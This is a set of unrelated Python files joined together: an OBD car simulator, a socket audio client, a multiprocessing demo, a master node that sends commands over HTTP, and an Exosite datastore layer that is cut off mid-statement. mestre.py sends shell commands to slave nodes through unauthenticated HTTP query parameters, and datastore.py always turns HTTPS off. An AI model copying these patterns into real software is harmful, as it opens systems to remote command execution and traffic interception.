self.panda.set_can_speed_kbps(0, self.__can_kbaud)
def can_add_extra_noise(self, noise_msg, addr=None):
self.__can_extra_noise_msgs.append((addr, noise_msg))
def _can_send(self, addr, msg):
if not self.__silent:
print(" CAN Reply (%x)" % addr, binascii.hexlify(msg))
self.panda.can_send(addr, msg + b'\x00'*(8-len(msg)), 0)
if self.__can_extra_noise_msgs:
noise = self.__can_extra_noise_msgs.popleft()
self.panda.can_send(noise[0] if noise[0] is not None else addr,
noise[1] + b'\x00'*(8-len(noise[1])), 0)
def _can_addr_matches(self, addr):
if self.__can11b and (addr == 0x7DF or (addr & 0x7F8) == 0x7E0):
return True
if self.__can29b and (addr == 0x18db33f1 or (addr & 0x1FFF00FF) == 0x18da00f1):
return True
return False
def __can_process_msg(self, mode, pid, address, ts, data, src):
if not self.__silent:
print("CAN MSG", binascii.hexlify(data[1:1+data[0]]),
"Addr:", hex(address), "Mode:", hex(mode)[2:].zfill(2),
"PID:", hex(pid)[2:].zfill(2), "canLen:", len(data),
binascii.hexlify(data))
if self._can_addr_matches(address) and len(data) == 8:
outmsg = None
if data[:3] == b'\x30\x00\x00' and self.__can_multipart_data:
if not self.__silent:
print("Request for more data")
outaddr = 0x7E8 if address == 0x7DF or address == 0x7E0 else 0x18DAF110
msgnum = 1
while(self.__can_multipart_data):
datalen = min(7, len(self.__can_multipart_data))
msgpiece = struct.pack("B", 0x20 | msgnum) + self.__can_multipart_data[:datalen]
self._can_send(outaddr, msgpiece)
self.__can_multipart_data = self.__can_multipart_data[7:]
msgnum = (msgnum+1)%0x10
time.sleep(0.01)
else:
outmsg = self._process_obd(mode, pid)
if outmsg:
outaddr = 0x7E8 if address == 0x7DF or address == 0x7E0 else 0x18DAF110
if len(outmsg) <= 5:
self._can_send(outaddr,
struct.pack("BBB", len(outmsg)+2, 0x40|data[1], pid) + outmsg)
else:
first_msg_len = min(3, len(outmsg)%7)
payload_len = len(outmsg)+3
msgpiece = struct.pack("BBBBB", 0x10 | ((payload_len>>8)&0xF),
payload_len&0xFF,
0x40|data[1], pid, 1) + outmsg[:first_msg_len]
self._can_send(outaddr, msgpiece)
self.__can_multipart_data = outmsg[first_msg_len:]
#########################
# General OBD functions #
#########################
def _process_obd(self, mode, pid):
if mode == 0x01: # Mode: Show current data
if pid == 0x00: #List supported things
return b"\xff\xff\xff\xfe"#b"\xBE\x1F\xB8\x10" #Bitfield, random features
elif pid == 0x01: # Monitor Status since DTC cleared
return b"\x00\x00\x00\x00" #Bitfield, random features
elif pid == 0x04: # Calculated engine load
return b"\x2f"
elif pid == 0x05: # Engine coolant temperature
return b"\x3c"
elif pid == 0x0B: # Intake manifold absolute pressure
return b"\x90"
elif pid == 0x0C: # Engine RPM
return b"\x1A\xF8"
elif pid == 0x0D: # Vehicle Speed
return b"\x53"
elif pid == 0x10: # MAF air flow rate
return b"\x01\xA0"
elif pid == 0x11: # Throttle Position
return b"\x90"
elif pid == 0x33: # Absolute Barometric Pressure
return b"\x90"
elif mode == 0x09: # Mode: Request vehicle information
if pid == 0x02: # Show VIN
return b"1D4GP00R55B123456"
if pid == 0xFC: # test long multi message. Ligned up for LIN responses
return b''.join((struct.pack(">BBH", 0xAA, 0xAA, num+1) for num in range(80)))
if pid == 0xFD: # test long multi message
parts = (b'\xAA\xAA\xAA' + struct.pack(">I", num) for num in range(80))
return b'\xAA\xAA\xAA' + b''.join(parts)
if pid == 0xFE: # test very long multi message
parts = (b'\xAA\xAA\xAA' + struct.pack(">I", num) for num in range(584))
return b'\xAA\xAA\xAA' + b''.join(parts) + b'\xAA'
if pid == 0xFF:
return b'\xAA\x00\x00' +\
b"".join(((b'\xAA'*5)+struct.pack(">H", num+1) for num in range(584)))
#return b"\xAA"*100#(0xFFF-3)
if __name__ == "__main__":
serial = os.getenv("SERIAL") if os.getenv("SERIAL") else None
kbaud = int(os.getenv("CANKBAUD")) if os.getenv("CANKBAUD") else 500 # type: ignore
bitwidth = int(os.getenv("CANBITWIDTH")) if os.getenv("CANBITWIDTH") else 0 # type: ignore
canenable = bool(int(os.getenv("CANENABLE"))) if os.getenv("CANENABLE") else True # type: ignore
linenable = bool(int(os.getenv("LINENABLE"))) if os.getenv("LINENABLE") else True # type: ignore
sim = ELMCarSimulator(serial, can_kbaud=kbaud, can=canenable, lin=linenable)
if(bitwidth == 0):
sim.can_mode_11b_29b()
if(bitwidth == 11):
sim.can_mode_11b()
if(bitwidth == 29):
sim.can_mode_29b()
import signal
def signal_handler(signal, frame):
print('\nShutting down simulator')
sim.stop()
sim.join()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
sim.start()
signal.pause()
|
doctor.py
|
import socket
import threading
import pyaudio
import sys
class Client:
def __init__(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while 1:
try:
self.target_ip = input('Enter IP address of server --> ')
self.target_port = int(input('Enter target port of server --> '))
self.s.connect((self.target_ip, self.target_port))
break
except:
print("Couldn't connect to server")
chunk_size = 1024 # 512
audio_format = pyaudio.paInt16
channels = 1
rate = 2048
# initialise microphone recording
self.p = pyaudio.PyAudio()
self.playing_stream = self.p.open(format=audio_format, channels=channels, rate=rate, output=True, frames_per_buffer=chunk_size)
#self.recording_stream = self.p.open(format=audio_format, channels=channels, rate=rate, input=True, frames_per_buffer=chunk_size)
print("Connected to Server")
# start threads
receive_thread = threading.Thread(target=self.receive_server_data)
receive_thread.start()
#self.send_data_to_server()
def receive_server_data(self):
while True:
try:
data = self.s.recv(2096)
#print(sys.getsizeof(data))
self.playing_stream.write(data)
except:
pass
client = Client()
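# --- Illustrative sketch (hypothetical, not in the original client) ---
# The commented-out recording_stream above hints at a send path; a minimal
# counterpart could capture microphone audio and push it over the same
# socket. The function name and parameters below are assumptions.
def send_audio(client, chunk_size=1024):
    recording_stream = client.p.open(format=pyaudio.paInt16, channels=1,
                                     rate=2048, input=True,
                                     frames_per_buffer=chunk_size)
    while True:
        try:
            data = recording_stream.read(chunk_size)
            client.s.sendall(data)   # stream raw PCM chunks to the server
        except Exception:
            break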
|
multiprocess.py
|
import time
from multiprocessing import Process,Manager,Value
class test:
def __init__(self):
self.manager = Manager()
# self.cache = self.manager.list()
self.token = self.manager.Value('i',0)
self.s_time = time.time()
def func1(self):
while True:
self.token.value += 1
if self.token.value >= 10:
# print("too many requests received")
pass
else:
print("hello world")
def func2(self):
while True:
if time.time() - self.s_time >= 5:
print("TIME: ",time.time() - self.s_time >= 5)
# self.cache[:] = []
self.token.value = 0
print(self.token.value)
self.s_time = time.time()
if __name__ == '__main__':
Test = test()
p2 = Process(target=Test.func1)
p2.start()
p1 = Process(target=Test.func2)
p1.start()
p2.join()
p1.join()
|
mestre.py
|
#!/usr/bin/python
import subprocess
import shlex
import string
import time
import itertools
import os
import urllib
import json
import urllib2
import types
from pprint import pprint
from threading import Thread
from escravo import GerenciadorEscravo
# belongs to the Master node
class ProcessoDesc:
id = 0
init_time = ''
status = 'wait' # wait, running, killed, finished
def __init__(self, id=0, init_time='',status='wait'):
self.id = id
self.init_time = init_time
self.status = status # wait, running, killed, finished
# belongs to the Master node
class Escravo:
id = 0
ip = "0.0.0.0"
lista_processo = []
# pp is the maximum number of processes this node supports
pp = 1
live = False
thread = None
def __init__(self, id=0, ip='0.0.0.0',pp=1):
self.id = id
self.ip = ip
self.pp = pp
self.live = True
#self.processando = False
""" {
processo: [
{
id=0,
init_time=2011-03-13 20:01:32,
status = 'runing'
},
{
...
}
]
}
"""
def getProcessos(self, json):
# parse the json
# self.lista_processo.append(ProcessoDesc(id, init_time, status))
print json
def getAlive(self,):
if isinstance(self.thread,types.NoneType):
return False
else:
return self.thread.is_alive()
# belongs to the Slave node
class GerenciadorMestre:
id = 0
ip = None
port = None
flagProcesso = False
itera_count = 0
escravo_count = 0
lista_escravo = []
nfs_path = None
#base_init = ''
parametros = ''
Gprocess_count = 0
process_count = 0 # counter of instantiated processes, reset when processing starts
total_pro = 0 # value set when the master is initialized (web interface)
fase01 = ''
fase02 = ''
fase03 = ''
execFase = 0 # fase01 -> 1, fase02 -> 2, fase03 -> 3, finished -> 4
threadProcessamento = None
'''
def __init__(self, nfs_path='', ip='0.0.0.0', port=8080):
self.nfs_path = nfs_path
self.ip = ip
self.port = port
# initialize the webservice?
# contact the main server?
'''
'''
def getProcessosStatus(self):
"""
check lista_processo
get the status of each process
and build the json
"""
json = []
json.append('{ processo: [')
i=0
for processo in self.lista_processo:
if i==1:
json.append(',')
json.append('{ id:'+str(processo.processo.pid)+',')
json.append('init_time:'+time.strftime("%Y-%m-%d %H:%M:%S")+',')
if processo.processo.poll() == None:
json.append("status: 'runing'")
else:
json.append("status: 'finished'")
i=1
json.append('}')
json.append(']}')
return "".join(json)
def getProcesso(self, id=0):
return lista_processo[id]
def setProcesso(self, cmd=''):
self.lista_processo.append(Processo(self.process_count+1, '','wait',cmd))
# start the process
#print cmd
def startProcessos(self):
for processo in self.lista_processo:
print 'Starting process: '+str(processo.id)
processo.executar()
'''
def getTotalProcessos(self,x):
res = len(self.parametros)
if res > x:
return x
else:
return res
def MyHttpRequest(self,url,wait_result=True):
# this method must guarantee that the request gets a response!
response=''
if url.find('http://')>=0:
url = urllib2.Request(url)
try:
response = urllib2.urlopen(url)
if(wait_result):
response = response.read()
else:
response.close()
return response
except urllib2.HTTPError:
return ''
except urllib2.URLError:
return ''
else:
return ''
def getSetup(self):
if isinstance(self.nfs_path,types.NoneType) and isinstance(self.ip,types.NoneType) and isinstance(self.port,types.NoneType):
return True
return False
def setSetup(self, nfs_path='', ip='0.0.0.0', port=8080):
self.nfs_path = nfs_path
self.ip = ip
#print 'setSetup '+str(port)
self.port = port
def getEscravoProcessando(self):
for escravo in self.lista_escravo:
if escravo.getAlive():
return True
# if we go through all of them and none is processing
return False
def getStatusProcesso(self):
pass
def analisa(self,query=''):
#myvars = {'metodo':None, 'cmd':None, 'id':None, 'nfs_path':None, 'num_process':None, 'server_ip':None}
myvars = {}
#myvars = {'status': 'false'}
'''
ge = GerenciadorEscravo()
print 'ge.getSetup() '+str(ge.getSetup())
'''
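# Expected query format (illustrative): '/managerpp/ajax?metodo=status&_dc=123'
# the part after '?' is split on '&' and then on '=' to fill the myvars dict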
query = query.replace('%20',' ')
query = query.replace('%27',"'")
query = string.split(query, '?')
if(len(query)>1):
if(query[0]=='/managerpp/ajax'):
if(query[1]!=None):
query = string.split(query[1], '&')
print query
for vars in query:
aux = string.split(vars, '=')
myvars[aux[0]] = aux[1]
print myvars
if myvars != None:
if myvars.get('metodo',False):
print 'Metodo: '+str(myvars.get('metodo'))
'''
if myvars.get('metodo') == 'setprocesso':
if myvars.get('pp',False):
for i in range(0, int(myvars.get('pp'))):
print i
if myvars.get('cmd',False):
self.setProcesso(myvars['cmd'])
myvars['status'] = 'true'
else:
myvars['status'] = 'false'
else:
if myvars.get('cmd',False):
self.setProcesso(myvars['cmd'])
myvars['status'] = 'true'
elif myvars.get('metodo') == 'getprocessosstatus':
self.getProcessosStatus()
elif myvars.get('metodo') == 'startprocessos':
self.startProcessos()
elif myvars.get('metodo') == 'getprocesso':
if myvars.get('id',False):
self.getProcesso(myvars['id'])
'''
if myvars.get('metodo') == 'escravos':
#jsonvars = {escravos:[{id:1,ip:'10.0.0.1',pp:10},{id:2,ip:'10.0.0.2',pp:11}]}
myjson = []
myjson.append('{ "escravos": [')
i=0
print 'length(self.lista_escravo)'+str(len(self.lista_escravo))
for escravo in self.lista_escravo:
#print processo
if i==1:
myjson.append(',')
print 'id: '+str(escravo.id)
myjson.append('{ "id":'+str(escravo.id)+',')
print 'ip: '+str(escravo.ip)
myjson.append('"ip":"'+escravo.ip+'",')
print 'pp: '+str(escravo.pp)
myjson.append('"pp": "'+str(escravo.pp)+'"')
i=1
myjson.append('}')
myjson.append(']}')
return "".join(myjson)
pass
elif myvars.get('metodo') == 'status':
# check the existing nodes
# 0 nodes == status -> false
if len(self.lista_escravo)>0:
# Still need to test whether the nodes are active
myvars["status"] = 'true'
myvars["count_no"] = len(self.lista_escravo)
else:
myvars["status"] = 'false'
#self.ip, self.port = self.client_address
myvars["ip"] = self.ip
print str(self.port)
myvars["port"] = str(self.port)
elif myvars.get('metodo') == 'initstatus':
if self.flagProcesso:
if not self.threadProcessamento.is_alive():
self.flagProcesso = False
myvars["processando"] = 'false'
myvars["path_ini"] = 'false'
myvars["status"] = 'false'
else:
myvars["fase01"] = self.fase01
myvars["fase02"] = self.fase02
myvars["fase03"] = self.fase03
#myvars["total_pro"] = self.total_pro
#myvars["base_init"] = self.base_init
myvars["path_ini"] = 'true'
myvars["nfs_path"] = len(self.nfs_path)
myvars["processando"] = 'true'
myvars["status"] = 'true'
else:
print 'Status do processamento'
print self.threadProcessamento
print self.flagProcesso
'''myvars["nfs_path"] = len(self.nfs_path)'''
myvars["nfs_path"] = os.getcwd()
myvars["processando"] = 'false'
myvars["path_ini"] = 'true'
myvars["status"] = 'false'
elif myvars.get('metodo') == 'startprocessos':
if not self.flagProcesso:
if self.escravo_count>0:
# defining the phases
if myvars.get('fase01',False):
self.fase01 = myvars.get('fase01')
if myvars.get('fase02',False):
self.fase02 = myvars.get('fase02')
if myvars.get('fase03',False):
self.fase03 = myvars.get('fase03')
#if myvars.get('total_pro',False):
# self.total_pro = int(myvars.get('total_pro'))
# self.process_count = 0
# self.itera_count = 0
#if myvars.get('base_init',False):
# self.base_init = myvars.get('base_init')
if myvars.get('parametros',False):
#print 'PARAMETROS'
#print myvars.get('parametros').encode("utf-8")
#print myvars.get('parametros')
#print urllib.unquote(myvars.get('parametros').encode("utf-8"))
#raw_input('Aperte ENTER para prosseguir: ')
self.parametros = json.loads(urllib.unquote(myvars.get('parametros').encode("utf-8")))
p=[]
for j in self.parametros:
p.append(self.parametros.get(json.dumps(j).replace('"','')))
self.parametros = list(itertools.product(*p))
self.total_pro = len(self.parametros)
self.process_count = 0
self.itera_count = 0
self.threadProcessamento=Thread( target=controleDeFluxo, args = (self,) )
self.threadProcessamento.start()
print 'Thread iniciada'
print self.threadProcessamento.is_alive()
# set the flag value
self.flagProcesso = True
myvars["status"] = 'true'
else:
# there is no process to start
myvars["status"] = 'false'
else:
print 'processando'
myvars["status"] = 'false'
elif myvars.get('metodo') == 'add_no':
pp=1
if myvars.get('pp',False):
pp = myvars.get('pp')
if myvars.get('ip',False):
# check whether this ip has already been registered
nalista = False
for escravo in self.lista_escravo:
if escravo.ip == myvars.get('ip'):
nalista = True
if not nalista:
self.escravo_count = self.escravo_count+int(pp)
self.lista_escravo.append(Escravo(self.escravo_count, myvars.get('ip'), int(pp)))
elif myvars.get('metodo') == 'list_nfs_files':
print self.nfs_path
if len(self.nfs_path) >0:
i=0
files=[]
dirList=os.listdir(self.nfs_path)
for fname in dirList:
if os.path.isfile(self.nfs_path+'/'+fname):
if i==1:
files.append(',')
files.append('{"file":"'+fname+'"}')
i=1
#myvars["files"] = '[{"file":"file_exec"},{"file":"file_exec2"}]';
myvars["files"] = '['+''.join(files)+']';
print myvars["files"]
if myvars.get('_dc',False):
del myvars["_dc"]
if myvars.get('metodo',False):
del myvars["metodo"]
# {"files":[{"file":"/home/renedet/nfspath/file_exec"},{"file":"/home/renedet/nfspath/file_exec2"}]}
elif myvars.get('metodo') == 'break_process':
'''
if not isinstance(self.threadProcessamento, types.NoneType):
if self.threadProcessamento.isAlive():
self.threadProcessamento
'''
pass
elif myvars.get('metodo') == 'setup':
if myvars.get('nfs_path',False):
if os.path.isdir(urllib.unquote(myvars['nfs_path'].encode("utf-8"))):
self.nfs_path = urllib.unquote(myvars['nfs_path'].encode("utf-8"))
myvars['nfs_path'] = 'true'
print self.nfs_path
else:
myvars['nfs_path'] = 'false'
if myvars.get('num_process',False):
self.max_active_process = myvars['num_process']
# Still need to check how many processes it supports; but how to do that?
myvars["status"] = 'true'
return myvars
def controleEscravo(gerenciadormestre,escravo,processo,idprocesso):
erro = True
#url = 'http://'+escravo.ip+'/managerpp/ajax?metodo=setprocesso&idprocess='+str(idprocesso)+'&cmd=./'+urllib.quote(gerenciadormestre.fase02+' '+str(gerenciadormestre.itera_count)+' '+' '.join(processo))
url = 'http://'+escravo.ip+'/managerpp/ajax?metodo=setprocesso&idprocess='+str(idprocesso)+'&cmd='+urllib.quote(gerenciadormestre.fase02+' '+' '.join(processo))
print 'URL metodo=setprocesso'
print url
#url = urllib.unquote(url)
auxjson = gerenciadormestre.MyHttpRequest(''.join(url),True)
print auxjson
if 0<len(auxjson):
resultado = json.loads(auxjson)
print resultado.get('status')
if resultado.get('status'):
url = urllib.unquote('http://'+escravo.ip+'/managerpp/ajax?metodo=startprocessos')
print url
gerenciadormestre.MyHttpRequest(''.join(url),False)
erro = False
teste = True
# checking whether processing has finished or is still active
while teste:
time.sleep(1)
url = urllib.unquote('http://'+escravo.ip+'/managerpp/ajax?metodo=getprocessosstatus')
auxjson = gerenciadormestre.MyHttpRequest(''.join(url),True)
print 'verificando se processamento terminou'
if len(auxjson)==0:
time.sleep(2)
auxjson = gerenciadormestre.MyHttpRequest(''.join(url),True)
if len(auxjson)==0:
# slave did not answer twice; mark it inactive and flag the error so the
# parameter set is returned to the list in the `if erro:` block below
escravo.live=False
#escravo.processando=False
teste = False
erro = True
break
if len(auxjson)>0:
processos = json.loads(auxjson)
processos = processos.get('processo')
p=0
for pro in processos:
print pro.get('status')
if 'finished'!=pro.get('status'):
p+=1
if p==0:
# all processes have finished
teste = False
#escravo.processando=False
if erro:
# returning the parameter set to the list so it can be dispatched to another slave
gerenciadormestre.parametros.append(processo)
# marking the slave as inactive
escravo.live=False
def controleDeFluxo(gerenciadormestre):
# checking whether fase02 exists
if os.path.exists(gerenciadormestre.nfs_path):
if os.path.isdir(gerenciadormestre.nfs_path):
while True:
aux = True
# starting fase01 (no parameters)
gerenciadormestre.execFase = 1
print 'Verificando result.mat'
# check whether result.mat exists in order to run fase01
if os.path.isfile(gerenciadormestre.nfs_path+'/result.mat'):
# run gerenciadormestre.fase01
print 'Iniciando fase01'
ge = GerenciadorEscravo()
ge.setSetup(gerenciadormestre.nfs_path,'',0)
#gerenciadormestre.process_count+=1
# internal processes are not counted
print 'Processo adicionado?'
# add fase01 to the list to be executed
print ge.setProcesso('./'+gerenciadormestre.fase01,1)
print 'Processo iniciado?'
# start executing fase01
print ge.startProcessos()
print 'Lista de Processos '+str(len(ge.lista_processo)) #0!!!
for processo in ge.lista_processo:
print 'Status do processo: '+processo.status
#while processo.poll() < 0:
while isinstance(processo.processo.poll(),types.NoneType):
# wait x seconds before testing again
time.sleep(1)
# fase01 analyzes result.mat to generate true.file
if os.path.isfile(gerenciadormestre.nfs_path+'/true.file'):
print gerenciadormestre.nfs_path+'/true.file gerado!'
aux = False
else:
print '# '+str(gerenciadormestre.itera_count)
else:
print 'Pulou fase01'
#time.sleep(10)
if aux == False:
print 'Finalizando processamento!'
break
#else:
# print 'Valor de aux:'
# print aux
# starting fase02 (numiterac, filename, processo_id); processo_id is supplied by the slave
gerenciadormestre.execFase = 2
# sending processes to the nodes
# still need to define the number of processes for each node
print 'Iniciando fase02'
gerenciadormestre.itera_count+=1
#time.sleep(10)
idprocesso=0
while 0 < len(gerenciadormestre.parametros) or gerenciadormestre.getEscravoProcessando():
#print 'verificando escravo livre'
# the problem occurs if there are no active slaves (escravo.live==True)
time.sleep(2)
for escravo in gerenciadormestre.lista_escravo:
#time.sleep(5)
#pprint (vars(escravo))
if escravo.live:
#print 'escravo processando'
#print escravo.getAlive()
#if False==escravo.processando:
if not escravo.getAlive():
#escravo.processando=True
#print 'escravo.pp'
print escravo.pp
processos_dist = gerenciadormestre.getTotalProcessos(escravo.pp)
print 'distribuindo processo'
print processos_dist
for i in range(1,processos_dist+1):
# the process counter is not the same as len(gerenciadormestre.parametros)
idprocesso+=1
escravo.thread=Thread( target=controleEscravo, args = (gerenciadormestre,escravo,gerenciadormestre.parametros.pop(),idprocesso,) )
escravo.thread.start()
"""
#while gerenciadormestre.process_count < gerenciadormestre.total_pro:
while gerenciadormestre.process_count < len(gerenciadormestre.parametros):
#print 'process_count '+str(gerenciadormestre.process_count)
#print 'total_pro '+str(gerenciadormestre.total_pro)
#local_process_count = gerenciadormestre.process_count
# distribuindo processos para os nos
for escravo in gerenciadormestre.lista_escravo:
#gerenciadormestre.process_count+=1
#url = 'http://'+escravo.ip+'/ajax?metodo=setprocesso&pp='+str(escravo.pp)+'&idprocess='+str(gerenciadormestre.process_count)+'&cmd=./'+urllib.quote(gerenciadormestre.fase02+' '+str(gerenciadormestre.itera_count)+' '+gerenciadormestre.nfs_path+'/'+gerenciadormestre.base_init+' '+str(gerenciadormestre.process_count))
#url = 'http://'+escravo.ip+'/ajax?metodo=setprocesso&pp='+str(escravo.pp)+'&idprocess='+str(gerenciadormestre.process_count)+'&cmd=./'+urllib.quote(gerenciadormestre.fase02+' '+str(gerenciadormestre.itera_count)+' '+gerenciadormestre.nfs_path+'/'+gerenciadormestre.base_init)
processos_dist = gerenciadormestre.getTotalProcessos(escravo.pp)
#url = 'http://'+escravo.ip+'/managerpp/ajax?metodo=setprocesso&pp='+str(processos_dist)+'&idprocess='+str(1+local_process_count+gerenciadormestre.Gprocess_count)+'&cmd=./'+urllib.quote(gerenciadormestre.fase02+' '+str(gerenciadormestre.itera_count)+' '+gerenciadormestre.nfs_path+'/'+gerenciadormestre.base_init)
# preciso guardar estes dados para poder recuperar caso fique fora do ar
# falta os parametros self.parametros
#url = 'http://'+escravo.ip+'/managerpp/ajax?metodo=setprocesso&pp='+str(processos_dist)+'&idprocess='+str(1+local_process_count+gerenciadormestre.Gprocess_count)+'&cmd=./'+urllib.quote(gerenciadormestre.fase02+' '+str(gerenciadormestre.itera_count)+' '+str(gerenciadormestre.parametros[gerenciadormestre.itera_count]))
for i in range(1,processos_dist+1):
url = 'http://'+escravo.ip+'/managerpp/ajax?metodo=setprocesso&idprocess='+str(1+local_process_count+gerenciadormestre.Gprocess_count)+'&cmd=./'+urllib.quote(gerenciadormestre.fase02+' '+str(gerenciadormestre.itera_count)+' '+str(gerenciadormestre.parametros[gerenciadormestre.itera_count]))
print url
gerenciadormestre.MyHttpRequest(''.join(url),False)
url = urllib.unquote('http://'+escravo.ip+'/managerpp/ajax?metodo=getprocessosstatus')
auxjson = gerenciadormestre.MyHttpRequest(''.join(url),True)
#time.sleep(1)
print auxjson
processos = json.loads(auxjson)
processos = processos.get('processo')
for p in processos:
if p.get('status',False):
print 'OK'
#local_process_count = gerenciadormestre.process_count
#solicitando para nos processarem
print 'Iniciando processos'
#time.sleep(10)
for escravo in gerenciadormestre.lista_escravo:
url = urllib.unquote('http://'+escravo.ip+'/managerpp/ajax?metodo=startprocessos')
print url
gerenciadormestre.MyHttpRequest(''.join(url),False)
#verifica de tempos em tempos se todos os nos terminaram de processar
#verificador...
print 'Verificando se processos terminaram'
#time.sleep(10)
verificador = 1
while verificador > 0:
verificador = 0
# menor tempo de processamento fase02
# 80 seg * 8 processos >= 1040 seg >= 17,33 minutos
time.sleep(30)
for escravo in gerenciadormestre.lista_escravo:
url = urllib.unquote('http://'+escravo.ip+'/managerpp/ajax?metodo=getprocessosstatus')
while True:
auxjson = gerenciadormestre.MyHttpRequest(''.join(url),True)
if len(auxjson)>0:
break
else:
escravo.live = False
# se caso nao houver resposta o metodo anterior
# tera que distribuir o processo para outro no
#print auxjson
processos = json.loads(auxjson)
processos = processos.get('processo')
for p in processos:
# enquanto todos os processos nao terminar
# de executar vai continuar verificando
if p.get('status') != 'finished':
verificador+=1
"""
# initializing the counter for the next cycle
#gerenciadormestre.Gprocess_count+=gerenciadormestre.process_count
#gerenciadormestre.process_count = 0
# if all nodes have finished, run fase03
# starting fase03 (numiterac)
print 'Iniciando fase03'
#time.sleep(10)
gerenciadormestre.execFase = 3
# generates gerenciadormestre.nfs_path+'/result.mat'
ge = GerenciadorEscravo()
ge.setSetup(gerenciadormestre.nfs_path,'',0)
#gerenciadormestre.process_count+=1
print ge.setProcesso('./'+gerenciadormestre.fase03+' '+str(gerenciadormestre.itera_count),1)
print ge.startProcessos()
for processo in ge.lista_processo:
# waiting for the process to finish
#while processo.poll() < 0:
while isinstance(processo.processo.poll(),types.NoneType):
# wait x seconds before testing again
time.sleep(1)
print 'Fim do ciclo '+str(gerenciadormestre.itera_count)
#time.sleep(10)
# increment the iterator
#gerenciadormestre.itera_count+=1
else:
gerenciadormestre.flagProcesso = False
else:
gerenciadormestre.flagProcesso = False
gerenciadormestre.flagProcesso = False
|
datastore.py
|
#==============================================================================
# datastore.py
# Buffering, caching and batch functions for access to the Exosite Data
# Platform using the JSON RPC API over HTTP.
# This layer was written so that a system with many subscriber/provider tasks
# could simultaneously access the platform efficiently.
#==============================================================================
#
# Tested with python 2.6
#
# Copyright (c) 2014, Exosite LLC
# All rights reserved.
#
import threading
import time
import sys
import logging
from onep import OnepV1
from exceptions import OneException
# setup default configurations
transport_config = {'host': 'm2.exosite.com',
'port': '80',
'url': '/onep:v1/rpc/process',
'https': False,
'timeout': 3}
datastore_config = {'write_buffer_size': 1024,
'read_cache_size': 1024,
'read_cache_expire_time': 5,
'log_level': 'debug'}
log = logging.getLogger(__name__)
lock = threading.Lock()
class Datastore():
def __init__(self,
cik,
interval,
autocreate=False,
config=datastore_config,
transport=transport_config):
self._liveBuffer = dict()
self._recordBuffer = dict()
self._aliasDict = dict()
self._cache = dict()
self._cacheCount = 0
self._recordCount = 0
self._auto = autocreate
self._config = config
if 'https' in transport:
transport['https'] = False
self._conn = OnepV1(transport['host'],
transport['port'],
transport['url'],
transport['https'],
transport['timeout'])
self._cik = cik
if interval < 1:
interval = 1
self._interval = interval
def __bufferCount(self):
return len(self._liveBuffer) + self._recordCount
def __isBufferFull(self):
return self.__bufferCount() >= self._config['write_buffer_size']
def __isLiveBufferEmpty(self):
if self._liveBuffer:
return False
else:
return True
def __forceTerminate(self):
if self._killed and self._forceterminate:
self._liveBuffer.clear()
return True
else:
return False
# One platform queries below
def __lookup(self, alias, forcequery=False):
if (not forcequery) and alias in self._aliasDict:
return self._aliasDict[alias]
else:
status, res = self._conn.lookup(self._cik, 'alias', alias)
if not status:
self._aliasDict[alias] = False
return False
else:
self._aliasDict[alias] = res
return res
def __read(self,
alias,
count=1,
forcequery=False,
sort='desc',
starttime=None,
endtime=None):
rid = self.__lookup(alias, forcequery)
if None != starttime and None != endtime:
status, res = self._conn.read(
self._cik,
rid,
{"starttime": starttime,
"endtime": endtime,
"limit": count,
"sort": sort})
else:
status, res = self._conn.read(self._cik,
rid,
{"limit": count,
"sort": sort})
if not status:
raise OneException(
"Error message from one platform (read): %s" % res)
return res
def __record(self, alias, entries):
rid = self.__lookup(alias)
record_status, record_message = self._conn.record(self._cik,
rid,
entries)
if not (True == record_status and 'ok' == record_message):
msg = "Error message from one platform (record): %s"
raise OneException(msg % record_message)
return True
def __writegroup(self, entries):
data = list()
for (alias, value) in entries:
rid = self.__lookup(alias)
data.append([rid, value])
write_status, write_message = self._conn.writegroup(self._cik, data)
if not (True == write_status and 'ok' == write_message):
msg = "Error message from one platform (write): %s,%s"
raise OneException(msg % (value, write_message))
return True
def __createDataport(self,
alias,
name=None,
format="string",
preprocess=[],
count="infinity",
duration="infinity",
visibility='parent'):
if None == name:
name = alias
desc = {"format": format,
"name": name,
'visibility': visibility,
"retention": {"count": count,
"duration": duration},
"preprocess": preprocess}
create_status,rid = self._conn.create(self._cik, "dataport", desc)
if create_status:
map_status, map_message = self._conn.map(self._cik, rid, alias)
if map_status:
self._aliasDict[alias] = rid
return True
else:
self._conn.drop(self._cik, rid)
log.error(map_message)
return False
else:
log.error(rid)
return False
def __checkDataportExist(self, alias):
if self.__lookup(alias):
return True
else:
if self._auto:
if not self.__createDataport(
alias=alias,
format=self._auto['format'],
preprocess=self._auto['preprocess'],
count=self._auto['count'],
duration=self._auto['duration'],
visibility=self._auto['visibility']):
raise OneException("Fail to create dataport.")
return True
else:
m = "Data source does not exist while not in AUTO_CREATE mode."
log.warn(m)
return False
# Write buffer processing below
def __processJsonRPC(self):
while not self.__forceTerminate():
time.sleep(self._interval)
livedata = list()
lock.acquire()
try:
timestamp = int(time.time())
aliases = self._liveBuffer.keys()
for alias in aliases:
value = self._liveBuffer[alias]
try:
# create datasource if necessary
if self.__checkDataportExist(alias):
# Move to live data
livedata.append([alias, value])
msg = "Data to be written (alias,value): ('%s',%s)"
log.debug(msg % (alias, value))
except OneException:
# catch exception, add to recordBuffer
if not alias in self._recordBuffer:
self._recordBuffer[alias] = list()
self._recordBuffer[alias].append(
[timestamp, value, True])
self._recordCount += 1
finally:
del self._liveBuffer[alias]
finally:
self._liveBuffer.clear()
lock.release()
# write live data
if livedata:
timestamp = int(time.time())
try:
self.__writegroup(livedata)
log.info("[Live] Written to 1p:" + str(livedata))
except OneException:
# go to historical data when write live data failure
e = sys.exc_info()[1]
msg = "Exception While Writing Live Data: {0}"
log.error(msg.format(e.message))
log.debug("Previous Exception For: {0}".format(livedata))
lock.acquire()
try:
for (alias, value) in livedata:
if not alias in self._recordBuffer:
self._recordBuffer[alias] = list()
offset = True
self._recordBuffer[alias].append(
[timestamp, value, offset])
self._recordCount += 1
finally:
lock.release()
except Exception:
e = sys.exc_info()[1]
log.exception("Unknown Exception While Writing Data")
## write historical data
lock.acquire()
try:
aliases = self._recordBuffer.keys()
curtime = int(time.time())
for alias in aliases:
entries = self._recordBuffer[alias]
try:
if self.__checkDataportExist(alias):
recentry = list()
for entry in entries:
if True == entry[2]: # offset mode
offset = entry[0] - curtime
if offset == 0:
# Must be a negative number.
offset = -1
recentry.append([offset, entry[1]])
else:
recentry.append([entry[0], entry[1]])
if recentry:
try:
self.__record(alias, recentry)
log.info("[Historical] Written to 1p: "
